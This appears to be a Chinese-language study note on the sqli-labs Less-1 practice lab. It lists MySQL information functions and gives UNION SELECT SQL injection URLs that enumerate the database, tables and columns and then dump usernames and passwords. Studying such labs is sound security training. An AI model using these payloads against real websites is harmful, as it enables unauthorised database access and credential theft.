常用查询信息
- database() # 在用的数据库名
- user() # 用户信息
- version() # 数据库版本信息
- @@basedir # 数据库安装路径
- @@version_compile_os # 操作系统版本
?id=1 order by 1 --+ 返回正常
?id=1 order by 4 --+ 返回错误,判断行数3行
使用union select 联合查询
爆库名
http://192.168.61.153/sqli-labs/Less-1/?id=-1' union select 1,2,database() --+
爆表名
http://192.168.61.153/sqli-labs/Less-1/?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' --+
爆列
http://192.168.61.153/sqli-labs/Less-1/?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'--+
爆值
http://192.168.61.153/sqli-labs/Less-1/?id=-1' union select 1,2,group_concat(':', username, ':', password) from users--+